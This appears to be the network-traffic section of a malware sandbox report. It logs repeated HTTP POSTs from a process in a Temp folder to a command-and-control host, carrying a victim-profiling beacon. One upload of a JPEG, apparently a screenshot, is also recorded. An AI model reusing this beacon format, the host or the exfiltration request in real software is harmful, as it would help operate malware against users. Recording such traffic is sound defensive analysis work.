                          292192.168.2.450118178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:16.857429028 CET13817OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:16.880999088 CET13818INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:16 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:16.881016016 CET13818INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          293192.168.2.450119178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:17.014741898 CET13819OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:17.037199020 CET13820INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:17 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:17.037229061 CET13821INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          294192.168.2.450120178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:17.173724890 CET14263OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:17.200238943 CET14263INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:17 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          295192.168.2.450121178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:17.343234062 CET14359OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:17.368680954 CET14359INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:17 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          296192.168.2.450122178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:17.513107061 CET14360OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:17.538170099 CET14361INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:17 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          297192.168.2.450123178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:17.675899029 CET14361OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:17.701277971 CET14362INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:17 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          298192.168.2.450124178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:17.786742926 CET14362OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:17.787223101 CET14362OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:17.787628889 CET14373OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:17.787847042 CET14375OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:17.811633110 CET14378OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:17.811682940 CET14384OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:17.811702967 CET14390OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:17.811722040 CET14394OUTData Raw: ce 8a f4 54 fe 47 a1 a6 98 18 52 e5 60 a4 88 80 a5 a7 79 6c 3b 52 60 8a 2c 55 c4 c5 28 a2 97 b5 02 0a 5a 29 69 88 4a 5a 29 45 31 05 25 3a 80 29 88 40 29 71 4b 45 31 5c 4c 52 81 4b 8a 31 40 06 29 71 46 29 71 4c 42 52 8a 52 28 02 98 83 14 01 45 2d
                          Data Ascii: TGR`yl;R`,U(Z)iJZ)E1%:)@)qKE1\LRK1@)qF)qLBRR(E-(:RZJQMQKH))%-JZ(J*RbRQNNQi(NRiE-Q!K)jbpHTbT-"'OZ(0idB:sWNrE$gyl:6
                          Nov 12, 2021 22:24:17.811850071 CET14398OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:17.811887980 CET14401OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:17.816914082 CET14402INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:17 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 